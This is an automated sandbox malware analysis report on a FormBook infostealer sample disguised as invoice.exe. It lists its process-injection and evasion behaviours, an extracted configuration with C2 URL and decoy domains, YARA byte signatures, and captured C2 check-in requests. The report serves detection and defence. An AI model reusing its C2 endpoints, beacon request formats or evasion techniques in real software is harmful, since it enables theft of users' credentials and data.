Loading ...

Play interactive tourEdit tour

Analysis Report invoice.exe

Overview

General Information

Sample Name:invoice.exe
Analysis ID:383898
MD5:492017e064cab97dd8ea27abd3e5cfca
SHA1:a3addbdea8245b2e16c6ef551755b9d0e66e8e2b
SHA256:524306af2db603c7db95227603c3014b67c27cfb2f88d12de2a599ece24575e2
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • invoice.exe (PID: 1972 cmdline: 'C:\Users\user\Desktop\invoice.exe' MD5: 492017E064CAB97DD8EA27ABD3E5CFCA)
    • invoice.exe (PID: 480 cmdline: C:\Users\user\Desktop\invoice.exe MD5: 492017E064CAB97DD8EA27ABD3E5CFCA)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 5064 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\invoice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.sookepointcargo.com/e3rs/"], "decoy": ["mcni360clientapp.com", "dateyourlovelive.club", "amongugadu.com", "jarruslogistics.com", "jeejwbvf.icu", "amnil-wecu.xyz", "armaccountingbs.com", "revistadedisseny.com", "aqiyi.club", "cuchdblackboard.com", "hancement.info", "humanizantes.com", "slingshotct.com", "degen.fund", "onemindtransformed.com", "theunlearningjourney.com", "zmid.xyz", "profirma-nachfolge.com", "curiget.xyz", "officinadellapappa.com", "leverage.community", "improvetechprocess.com", "legacyadmin.support", "quantumwater.info", "gsinghproperties.com", "gigbager.com", "menpeeinthesink.com", "ultimate.icu", "hotelmaktub.com", "arizonagridiron.com", "rvsmiami.com", "allzodiac.com", "knoxvilleoutdoorkitchens.com", "gunungbatufrozen.com", "keystone-sd.com", "positiveagenda-consulting.com", "harshdeepfashion.com", "imetmymurdereronline.com", "thesnackculture.com", "carolinapropertiessolution.com", "prfectskin.com", "okaog.com", "highdeserthealthinsurance.com", "ovelgonne.com", "tgcmaine.com", "jinlan.online", "airportlimo4u.com", "serendipity-collective.com", "bibeiw.com", "unagelo.com", "pageonefourplay.info", "apmrfgpu.icu", "cognitiveautomationtool.com", "applelucycooking.com", "can-march.xyz", "modernmarvelrealtors.com", "panasianetwork.net", "flowhcf.com", "earwaxsux.com", "konakia.net", "bges301.com", "rosuba.com", "hedgetheory.com", "myyearwithoutjews.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.invoice.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.invoice.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.invoice.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        3.2.invoice.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.invoice.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.sookepointcargo.com/e3rs/"], "decoy": ["mcni360clientapp.com", "dateyourlovelive.club", "amongugadu.com", "jarruslogistics.com", "jeejwbvf.icu", "amnil-wecu.xyz", "armaccountingbs.com", "revistadedisseny.com", "aqiyi.club", "cuchdblackboard.com", "hancement.info", "humanizantes.com", "slingshotct.com", "degen.fund", "onemindtransformed.com", "theunlearningjourney.com", "zmid.xyz", "profirma-nachfolge.com", "curiget.xyz", "officinadellapappa.com", "leverage.community", "improvetechprocess.com", "legacyadmin.support", "quantumwater.info", "gsinghproperties.com", "gigbager.com", "menpeeinthesink.com", "ultimate.icu", "hotelmaktub.com", "arizonagridiron.com", "rvsmiami.com", "allzodiac.com", "knoxvilleoutdoorkitchens.com", "gunungbatufrozen.com", "keystone-sd.com", "positiveagenda-consulting.com", "harshdeepfashion.com", "imetmymurdereronline.com", "thesnackculture.com", "carolinapropertiessolution.com", "prfectskin.com", "okaog.com", "highdeserthealthinsurance.com", "ovelgonne.com", "tgcmaine.com", "jinlan.online", "airportlimo4u.com", "serendipity-collective.com", "bibeiw.com", "unagelo.com", "pageonefourplay.info", "apmrfgpu.icu", "cognitiveautomationtool.com", "applelucycooking.com", "can-march.xyz", "modernmarvelrealtors.com", "panasianetwork.net", "flowhcf.com", "earwaxsux.com", "konakia.net", "bges301.com", "rosuba.com", "hedgetheory.com", "myyearwithoutjews.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: invoice.exeJoe Sandbox ML: detected
          Source: 3.2.invoice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: invoice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.492637672.000000000475F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\invoice.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.sookepointcargo.com/e3rs/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.zmid.xyz
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO HTTP/1.1Host: www.flowhcf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X HTTP/1.1Host: www.jinlan.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=UjY/ETYDec4qhoizf7RP+uVqhCLoGuhip7tAF9t9xQZdbBeLWBLuGPY37yNXVCM5GTyP&uFQl=XP7HMT_8 HTTP/1.1Host: www.armaccountingbs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ/wFsHy6lqdqQBlr0&uFQl=XP7HMT_8 HTTP/1.1Host: www.knoxvilleoutdoorkitchens.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8 HTTP/1.1Host: www.highdeserthealthinsurance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=Ok77fVcdVMfIiR4pMXON/NN29f2Jfu2AMoU186FmLUOu6U92Y3SpeQqKBhzvmDYI2dCa HTTP/1.1Host: www.hotelmaktub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8 HTTP/1.1Host: www.legacyadmin.supportConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO HTTP/1.1Host: www.flowhcf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X HTTP/1.1Host: www.jinlan.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=UjY/ETYDec4qhoizf7RP+uVqhCLoGuhip7tAF9t9xQZdbBeLWBLuGPY37yNXVCM5GTyP&uFQl=XP7HMT_8 HTTP/1.1Host: www.armaccountingbs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ/wFsHy6lqdqQBlr0&uFQl=XP7HMT_8 HTTP/1.1Host: www.knoxvilleoutdoorkitchens.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8 HTTP/1.1Host: www.highdeserthealthinsurance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=Ok77fVcdVMfIiR4pMXON/NN29f2Jfu2AMoU186FmLUOu6U92Y3SpeQqKBhzvmDYI2dCa HTTP/1.1Host: www.hotelmaktub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8 HTTP/1.1Host: www.legacyadmin.supportConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.flowhcf.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Thu, 08 Apr 2021 10:04:37 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp, invoice.exe, 00000000.00000002.245138274.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: wscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8g
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: invoice.exeString found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
          Source: invoice.exeString found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
          Source: invoice.exeString found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: wscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmpString found in binary or memory: https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

